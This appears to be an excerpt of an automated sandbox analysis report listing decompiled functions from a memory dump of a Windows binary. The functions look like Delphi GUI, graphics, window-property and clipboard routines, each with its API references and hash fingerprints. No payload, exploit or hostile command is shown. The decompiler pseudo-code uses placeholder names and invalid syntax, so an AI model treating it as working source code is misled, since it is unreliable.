                                                                                • Opcode ID: fa762538808ecbf9c70f82dd65a79da2be8a886e74ae2368f223f3776803766a
                                                                                • Instruction ID: 9f3064282c2c23eb361a6cf1d432f5e155d01ea21818f742c5ad4657b8b276cc
                                                                                • Opcode Fuzzy Hash: fa762538808ecbf9c70f82dd65a79da2be8a886e74ae2368f223f3776803766a
                                                                                • Instruction Fuzzy Hash: 27419560444791AADB11CF54C8CDBA73BE8AF05304F0844BAFD9C9F287D7B99848CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E00420BFC(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				signed int _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed int _v24;
                                                                                				signed int _v32;
                                                                                				signed short _v44;
                                                                                				int _t36;
                                                                                				signed int _t37;
                                                                                				signed short _t38;
                                                                                				signed int _t39;
                                                                                				signed short _t43;
                                                                                				signed int* _t47;
                                                                                				signed int _t51;
                                                                                				intOrPtr _t61;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                				intOrPtr _t70;
                                                                                
                                                                                				_t68 = _t69;
                                                                                				_t70 = _t69 + 0xffffff90;
                                                                                				_v16 = __ecx;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t47 = _a8;
                                                                                				_v24 = _v16 << 4;
                                                                                				_v20 = E00408330(_v24, __eflags);
                                                                                				 *[fs:edx] = _t70;
                                                                                				_t51 = _v24;
                                                                                				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x420ef3, _t68, __edi, __esi, __ebx, _t67);
                                                                                				if(( *_t47 | _t47[1]) != 0) {
                                                                                					_t36 = _a4;
                                                                                					 *_t36 =  *_t47;
                                                                                					 *(_t36 + 4) = _t47[1];
                                                                                				} else {
                                                                                					 *_a4 = GetSystemMetrics(0xb);
                                                                                					_t36 = GetSystemMetrics(0xc);
                                                                                					 *(_a4 + 4) = _t36;
                                                                                				}
                                                                                				_push(0);
                                                                                				L00406E20();
                                                                                				_v44 = _t36;
                                                                                				if(_v44 == 0) {
                                                                                					E004200C0(_t51);
                                                                                				}
                                                                                				_push(_t68);
                                                                                				_push(0x420ce5);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t70;
                                                                                				_push(0xe);
                                                                                				_t37 = _v44;
                                                                                				_push(_t37);
                                                                                				L00406AF8();
                                                                                				_push(0xc);
                                                                                				_t38 = _v44;
                                                                                				_push(_t38);
                                                                                				L00406AF8();
                                                                                				_t39 = _t37 * _t38;
                                                                                				if(_t39 <= 8) {
                                                                                					__eflags = 1;
                                                                                					_v32 = 1 << _t39;
                                                                                				} else {
                                                                                					_v32 = 0x7fffffff;
                                                                                				}
                                                                                				_pop(_t61);
                                                                                				 *[fs:eax] = _t61;
                                                                                				_push(E00420CEC);
                                                                                				_t43 = _v44;
                                                                                				_push(_t43);
                                                                                				_push(0);
                                                                                				L00407080();
                                                                                				return _t43;
                                                                                			}
                                                                                0x00420cdd
                                                                                0x00420cdf
                                                                                0x00420ce4

                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 00420C4A
                                                                                • GetSystemMetrics.USER32 ref: 00420C56
                                                                                • 72E7AC50.USER32(00000000), ref: 00420C72
                                                                                • 72E7AD70.GDI32(00000000,0000000E,00000000,00420CE5,?,00000000), ref: 00420C99
                                                                                • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00420CE5,?,00000000), ref: 00420CA6
                                                                                • 72E7B380.USER32(00000000,00000000,00420CEC,0000000E,00000000,00420CE5,?,00000000), ref: 00420CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MetricsSystem$B380
                                                                                • String ID:
                                                                                • API String ID: 3145338429-0
                                                                                • Opcode ID: e33d606845e976a746918d03a0318887393e3dad17af5a3bfb32981df972067d
                                                                                • Instruction ID: b5a1ea645670a87a40300d2b3d0004dea96dac25918e5ae6dc528da29662d6d6
                                                                                • Opcode Fuzzy Hash: e33d606845e976a746918d03a0318887393e3dad17af5a3bfb32981df972067d
                                                                                • Instruction Fuzzy Hash: 1F31A270B00204DFEB04DFA6D881AAEBBF5FF49310F50816AF414AB391C6789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 45%
                                                                                			E0042106C(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                				char _v5;
                                                                                				struct HDC__* _v12;
                                                                                				struct HDC__* _v16;
                                                                                				struct HDC__* _t29;
                                                                                				struct tagBITMAPINFO* _t32;
                                                                                				intOrPtr _t39;
                                                                                				struct HBITMAP__* _t43;
                                                                                				void* _t46;
                                                                                
                                                                                				_t32 = __ecx;
                                                                                				_t43 = __eax;
                                                                                				E00420F1C(__eax, _a4, __ecx);
                                                                                				_v12 = 0;
                                                                                				_push(0);
                                                                                				L00406A58();
                                                                                				_v16 = 0;
                                                                                				_push(_t46);
                                                                                				_push(0x421109);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t46 + 0xfffffff4;
                                                                                				if(__edx != 0) {
                                                                                					_push(0);
                                                                                					_push(__edx);
                                                                                					_t29 = _v16;
                                                                                					_push(_t29);
                                                                                					L00406BD0();
                                                                                					_v12 = _t29;
                                                                                					_push(_v16);
                                                                                					L00406BA0();
                                                                                				}
                                                                                				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                                                                                				_pop(_t39);
                                                                                				 *[fs:eax] = _t39;
                                                                                				_push(E00421110);
                                                                                				if(_v12 != 0) {
                                                                                					_push(0);
                                                                                					_push(_v12);
                                                                                					_push(_v16);
                                                                                					L00406BD0();
                                                                                				}
                                                                                				return DeleteDC(_v16);
                                                                                			}












                                                                                APIs
                                                                                  • Part of subcall function 00420F1C: GetObjectA.GDI32(?,00000054), ref: 00420F30
                                                                                • 72E7A590.GDI32(00000000), ref: 0042108E
                                                                                • 72E7B410.GDI32(?,?,00000000,00000000,00421109,?,00000000), ref: 004210AF
                                                                                • 72E7B150.GDI32(?,?,?,00000000,00000000,00421109,?,00000000), ref: 004210BB
                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 004210D2
                                                                                • 72E7B410.GDI32(?,00000000,00000000,00421110,00000000,?,?,?,00000000,00000000,00421109,?,00000000), ref: 004210FA
                                                                                • DeleteDC.GDI32(?), ref: 00421103
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: B410$A590B150BitsDeleteObject
                                                                                • String ID:
                                                                                • API String ID: 3837315262-0
                                                                                • Opcode ID: e701bdbdbff6446c448e1e9e753bd8837e927accd3bded0621ef232a79ac0767
                                                                                • Instruction ID: 4c8e86a8e62bf8e843ce22e0fa3398f7087306fd2782e42c4131c5f231b58ff0
                                                                                • Opcode Fuzzy Hash: e701bdbdbff6446c448e1e9e753bd8837e927accd3bded0621ef232a79ac0767
                                                                                • Instruction Fuzzy Hash: E3118275B002187FDB10EBA9CC51F5EB7FCAB4D700F518466B514F7281D678A9108B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004324CC(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				char _v8;
                                                                                				void* _t20;
                                                                                				void* _t21;
                                                                                				void* _t27;
                                                                                				void* _t31;
                                                                                				void* _t35;
                                                                                				intOrPtr* _t43;
                                                                                
                                                                                				_t43 =  &_v8;
                                                                                				_t20 =  *0x46b8d0; // 0x0
                                                                                				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                                                                				_t21 =  *0x46b8d0; // 0x0
                                                                                				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                                                                				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                                                                					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                                                                				}
                                                                                				_t27 =  *0x46b8d0; // 0x0
                                                                                				SetPropA(_a4,  *0x487b72 & 0x0000ffff, _t27);
                                                                                				_t31 =  *0x46b8d0; // 0x0
                                                                                				SetPropA(_a4,  *0x487b70 & 0x0000ffff, _t31);
                                                                                				_t35 =  *0x46b8d0; // 0x0
                                                                                				 *0x46b8d0 = 0;
                                                                                				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                                                                				return  *_t43;
                                                                                			}











                                                                                APIs
                                                                                • SetWindowLongA.USER32 ref: 004324F4
                                                                                • GetWindowLongA.USER32 ref: 004324FF
                                                                                • GetWindowLongA.USER32 ref: 00432511
                                                                                • SetWindowLongA.USER32 ref: 00432524
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 0043253B
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 00432552
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: LongWindow$Prop
                                                                                • String ID:
                                                                                • API String ID: 3887896539-0
                                                                                • Opcode ID: 1d0c36f883103d76a0d62257e21793873c675a6b5b18f4571a362eb7fc807a2c
                                                                                • Instruction ID: 1d398ade87635050a55010048a09e70f80f05b49b1a79d506cad9994c015bbcd
                                                                                • Opcode Fuzzy Hash: 1d0c36f883103d76a0d62257e21793873c675a6b5b18f4571a362eb7fc807a2c
                                                                                • Instruction Fuzzy Hash: 1911EA75504249BFCB00EF99EC84D9A37ECFB08354F108226F914DB2A1D774EA408BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E004208AC(struct HDC__* __eax, signed int __ecx) {
                                                                                				char _v1036;
                                                                                				signed int _v1038;
                                                                                				struct tagRGBQUAD _v1048;
                                                                                				short _v1066;
                                                                                				short* _t15;
                                                                                				void* _t18;
                                                                                				struct HDC__* _t23;
                                                                                				void* _t26;
                                                                                				short* _t31;
                                                                                				short* _t32;
                                                                                
                                                                                				_t31 = 0;
                                                                                				 *_t32 = 0x300;
                                                                                				if(__eax == 0) {
                                                                                					_v1038 = __ecx;
                                                                                					E00402994(_t26, __ecx << 2,  &_v1036);
                                                                                				} else {
                                                                                					_push(0);
                                                                                					L00406A58();
                                                                                					_t23 = __eax;
                                                                                					_t18 = SelectObject(__eax, __eax);
                                                                                					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
                                                                                					SelectObject(_t23, _t18);
                                                                                					DeleteDC(_t23);
                                                                                				}
                                                                                				if(_v1038 != 0) {
                                                                                					if(_v1038 != 0x10 || E00420814(_t32) == 0) {
                                                                                						E004206A4( &_v1036, _v1038 & 0x0000ffff);
                                                                                					}
                                                                                					_t15 = _t32;
                                                                                					_push(_t15);
                                                                                					L00406A80();
                                                                                					_t31 = _t15;
                                                                                				}
                                                                                				return _t31;
                                                                                			}














                                                                                APIs
                                                                                • 72E7A590.GDI32(00000000,00000000,?,?,00424313,?,?,?,?,00422E1F,00000000,00422EAB), ref: 004208C5
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004208CE
                                                                                • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424313,?,?,?,?,00422E1F), ref: 004208E2
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004208EE
                                                                                • DeleteDC.GDI32(00000000), ref: 004208F4
                                                                                • 72E7A8F0.GDI32(?,00000000,?,?,00424313,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042093A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ObjectSelect$A590ColorDeleteTable
                                                                                • String ID:
                                                                                • API String ID: 1056449717-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0045AE60(void* __eax) {
                                                                                				struct tagRECT _v20;
                                                                                				struct HWND__* _t18;
                                                                                				void* _t29;
                                                                                				RECT* _t30;
                                                                                
                                                                                				_t29 = __eax;
                                                                                				ValidateRect(E0043BD14(__eax), 0);
                                                                                				InvalidateRect(E0043BD14(_t29), 0, 0xffffffff);
                                                                                				GetClientRect(E0043BD14(_t29), _t30);
                                                                                				_t18 = E0043BD14( *((intOrPtr*)(_t29 + 0x240)));
                                                                                				MapWindowPoints(E0043BD14(_t29), _t18,  &_v20, 2);
                                                                                				ValidateRect(E0043BD14( *((intOrPtr*)(_t29 + 0x240))), _t30);
                                                                                				return InvalidateRect(E0043BD14( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
                                                                                			}








                                                                                APIs
                                                                                • ValidateRect.USER32(00000000,00000000,0045B6B4), ref: 0045AE70
                                                                                • InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045B6B4), ref: 0045AE81
                                                                                • GetClientRect.USER32 ref: 0045AE8F
                                                                                • MapWindowPoints.USER32 ref: 0045AEAF
                                                                                • ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045B6B4), ref: 0045AEC1
                                                                                • InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045AED9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Rect$InvalidateValidate$ClientPointsWindow
                                                                                • String ID:
                                                                                • API String ID: 2846033224-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0041FF90(void* __eax) {
                                                                                				void* _t36;
                                                                                
                                                                                				_t36 = __eax;
                                                                                				UnrealizeObject(E0041F36C( *((intOrPtr*)(__eax + 0x14))));
                                                                                				SelectObject( *(_t36 + 4), E0041F36C( *((intOrPtr*)(_t36 + 0x14))));
                                                                                				if(E0041F44C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                                                                                					SetBkColor( *(_t36 + 4),  !(E0041E68C(E0041F330( *((intOrPtr*)(_t36 + 0x14))))));
                                                                                					return SetBkMode( *(_t36 + 4), 1);
                                                                                				} else {
                                                                                					SetBkColor( *(_t36 + 4), E0041E68C(E0041F330( *((intOrPtr*)(_t36 + 0x14)))));
                                                                                					return SetBkMode( *(_t36 + 4), 2);
                                                                                				}
                                                                                			}





                                                                                APIs
                                                                                  • Part of subcall function 0041F36C: CreateBrushIndirect.GDI32(?), ref: 0041F416
                                                                                • UnrealizeObject.GDI32(00000000), ref: 0041FF9C
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041FFAE
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041FFD1
                                                                                • SetBkMode.GDI32(?,00000002), ref: 0041FFDC
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041FFF7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 00420002
                                                                                  • Part of subcall function 0041E68C: GetSysColor.USER32(?), ref: 0041E696
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                • String ID:
                                                                                • API String ID: 3527656728-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409E74(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v273;
                                                                                				char _v534;
                                                                                				char _v790;
                                                                                				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                				char _v824;
                                                                                				intOrPtr _v828;
                                                                                				char _v832;
                                                                                				intOrPtr _v836;
                                                                                				char _v840;
                                                                                				intOrPtr _v844;
                                                                                				char _v848;
                                                                                				char* _v852;
                                                                                				char _v856;
                                                                                				char _v860;
                                                                                				char _v1116;
                                                                                				void* __edi;
                                                                                				struct HINSTANCE__* _t40;
                                                                                				intOrPtr _t51;
                                                                                				struct HINSTANCE__* _t53;
                                                                                				void* _t69;
                                                                                				long _t72;
                                                                                				void* _t73;
                                                                                				intOrPtr _t74;
                                                                                				intOrPtr _t75;
                                                                                				intOrPtr _t83;
                                                                                				intOrPtr _t86;
                                                                                				intOrPtr* _t87;
                                                                                
                                                                                				_v8 = __ecx;
                                                                                				_t73 = __edx;
                                                                                				_t87 = __eax;
                                                                                				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                				if(_v820.State != 0x1000) {
                                                                                					L2:
                                                                                					_t40 =  *0x487714; // 0x400000
                                                                                					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                					_v12 = E00409E68(_t73);
                                                                                					L4:
                                                                                					E00408BA4( &_v273, 0x104, E0040AC1C(0x5c, _t89) + 1);
                                                                                					_t74 = 0x409ff4;
                                                                                					_t86 = 0x409ff4;
                                                                                					_t83 =  *0x40771c; // 0x407768
                                                                                					if(E00403740(_t87, _t83) != 0) {
                                                                                						_t74 = E004047D0( *((intOrPtr*)(_t87 + 4)));
                                                                                						_t69 = E00408B40(_t74, 0x409ff4);
                                                                                						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                                							_t86 = 0x409ff8;
                                                                                						}
                                                                                					}
                                                                                					_t51 =  *0x486d9c; // 0x4074dc
                                                                                					_t16 = _t51 + 4; // 0xffe7
                                                                                					_t53 =  *0x487714; // 0x400000
                                                                                					LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
                                                                                					E00403504( *_t87,  &_v1116);
                                                                                					_v860 =  &_v1116;
                                                                                					_v856 = 4;
                                                                                					_v852 =  &_v273;
                                                                                					_v848 = 6;
                                                                                					_v844 = _v12;
                                                                                					_v840 = 5;
                                                                                					_v836 = _t74;
                                                                                					_v832 = 6;
                                                                                					_v828 = _t86;
                                                                                					_v824 = 6;
                                                                                					E00409260(_v8,  &_v790, _a4, 4,  &_v860);
                                                                                					return E00408B40(_v8, _t86);
                                                                                				}
                                                                                				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
                                                                                				_t89 = _t72;
                                                                                				if(_t72 != 0) {
                                                                                					_t75 = _t73 - _v820.AllocationBase;
                                                                                					__eflags = _t75;
                                                                                					_v12 = _t75;
                                                                                					goto L4;
                                                                                				}
                                                                                				goto L2;
                                                                                			}

































                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                • LoadStringA.USER32 ref: 00409F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID: hw@
                                                                                • API String ID: 3990497365-2938629419
                                                                                • Opcode ID: a90f6f03441cbaa7fa0682d0752cfab727030b6a8b25b319f2d74ba5cadffd5c
                                                                                • Instruction ID: 6dfe20bedbac6529fe5b7d32f625191ad228f2dd1b86655df6fb646d007f6676
                                                                                • Opcode Fuzzy Hash: a90f6f03441cbaa7fa0682d0752cfab727030b6a8b25b319f2d74ba5cadffd5c
                                                                                • Instruction Fuzzy Hash: 27412171A002589BDB21DB69CD85BDAB7BC9B08344F0044FAB548F7292D778AF84CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409E72(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v273;
                                                                                				char _v534;
                                                                                				char _v790;
                                                                                				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                				char _v824;
                                                                                				intOrPtr _v828;
                                                                                				char _v832;
                                                                                				intOrPtr _v836;
                                                                                				char _v840;
                                                                                				intOrPtr _v844;
                                                                                				char _v848;
                                                                                				char* _v852;
                                                                                				char _v856;
                                                                                				char _v860;
                                                                                				char _v1116;
                                                                                				void* __edi;
                                                                                				struct HINSTANCE__* _t40;
                                                                                				intOrPtr _t51;
                                                                                				struct HINSTANCE__* _t53;
                                                                                				void* _t69;
                                                                                				long _t72;
                                                                                				void* _t74;
                                                                                				intOrPtr _t75;
                                                                                				intOrPtr _t77;
                                                                                				intOrPtr _t85;
                                                                                				intOrPtr _t89;
                                                                                				intOrPtr* _t92;
                                                                                
                                                                                				_v8 = __ecx;
                                                                                				_t74 = __edx;
                                                                                				_t92 = __eax;
                                                                                				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                				if(_v820.State != 0x1000) {
                                                                                					L3:
                                                                                					_t40 =  *0x487714; // 0x400000
                                                                                					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                					_v12 = E00409E68(_t74);
                                                                                				} else {
                                                                                					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
                                                                                					_t101 = _t72;
                                                                                					if(_t72 != 0) {
                                                                                						_t77 = _t74 - _v820.AllocationBase;
                                                                                						__eflags = _t77;
                                                                                						_v12 = _t77;
                                                                                					} else {
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				E00408BA4( &_v273, 0x104, E0040AC1C(0x5c, _t101) + 1);
                                                                                				_t75 = 0x409ff4;
                                                                                				_t89 = 0x409ff4;
                                                                                				_t85 =  *0x40771c; // 0x407768
                                                                                				if(E00403740(_t92, _t85) != 0) {
                                                                                					_t75 = E004047D0( *((intOrPtr*)(_t92 + 4)));
                                                                                					_t69 = E00408B40(_t75, 0x409ff4);
                                                                                					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                                						_t89 = 0x409ff8;
                                                                                					}
                                                                                				}
                                                                                				_t51 =  *0x486d9c; // 0x4074dc
                                                                                				_t16 = _t51 + 4; // 0xffe7
                                                                                				_t53 =  *0x487714; // 0x400000
                                                                                				LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
                                                                                				E00403504( *_t92,  &_v1116);
                                                                                				_v860 =  &_v1116;
                                                                                				_v856 = 4;
                                                                                				_v852 =  &_v273;
                                                                                				_v848 = 6;
                                                                                				_v844 = _v12;
                                                                                				_v840 = 5;
                                                                                				_v836 = _t75;
                                                                                				_v832 = 6;
                                                                                				_v828 = _t89;
                                                                                				_v824 = 6;
                                                                                				E00409260(_v8,  &_v790, _a4, 4,  &_v860);
                                                                                				return E00408B40(_v8, _t89);
                                                                                			}

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                • LoadStringA.USER32 ref: 00409F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID: hw@
                                                                                • API String ID: 3990497365-2938629419
                                                                                • Opcode ID: 334110270a560beedd58625548b02213813cd1a699edec738f070ba869cd870d
                                                                                • Instruction ID: 0802fff38336e273a239bb27688692df7ffd8f152fb1f6293fdb009165743f52
                                                                                • Opcode Fuzzy Hash: 334110270a560beedd58625548b02213813cd1a699edec738f070ba869cd870d
                                                                                • Instruction Fuzzy Hash: E2412171A002589BDB21DB59CD85BDAB7BC9B08344F0044FAB548F7292D778AF848F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0042EFF0(intOrPtr* __eax, void* __edx) {
                                                                                				intOrPtr* _v8;
                                                                                				void* __ecx;
                                                                                				void* __ebp;
                                                                                				void* _t16;
                                                                                				void* _t20;
                                                                                				void* _t24;
                                                                                				void* _t25;
                                                                                				signed short _t26;
                                                                                				void* _t28;
                                                                                				intOrPtr _t29;
                                                                                				intOrPtr _t38;
                                                                                				void* _t42;
                                                                                				void* _t43;
                                                                                				void* _t45;
                                                                                				void* _t48;
                                                                                				intOrPtr _t51;
                                                                                
                                                                                				_t43 = __edx;
                                                                                				_v8 = __eax;
                                                                                				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
                                                                                				_push(_t51);
                                                                                				_push(0x42f092);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t51;
                                                                                				_t26 = EnumClipboardFormats(0);
                                                                                				_t52 = _t26;
                                                                                				if(_t26 == 0) {
                                                                                					L4:
                                                                                					_t29 =  *0x486a9c; // 0x41ce6c
                                                                                					E0040A16C(_t29, 1);
                                                                                					E00403D80();
                                                                                					__eflags = 0;
                                                                                					_pop(_t38);
                                                                                					 *[fs:eax] = _t38;
                                                                                					return  *((intOrPtr*)( *_v8 + 0x14))(0x42f099);
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t16 = E00421B64(_t26, _t52);
                                                                                						_t53 = _t16;
                                                                                						if(_t16 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
                                                                                						__eflags = _t26;
                                                                                						if(__eflags != 0) {
                                                                                							continue;
                                                                                						} else {
                                                                                							goto L4;
                                                                                						}
                                                                                						goto L6;
                                                                                					}
                                                                                					_t20 = GetClipboardData(_t26 & 0x0000ffff);
                                                                                					E00421A74(_t43, _t20, _t26, _t53, GetClipboardData(9));
                                                                                					_t24 = E00403E2C();
                                                                                					return _t24;
                                                                                				}
                                                                                				L6:
                                                                                			}

                                                                                APIs
                                                                                • EnumClipboardFormats.USER32(00000000,00000000,0042F092), ref: 0042F014
                                                                                • GetClipboardData.USER32 ref: 0042F034
                                                                                • GetClipboardData.USER32 ref: 0042F03D
                                                                                • EnumClipboardFormats.USER32(00000000,00000000,00000000,0042F092), ref: 0042F059
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
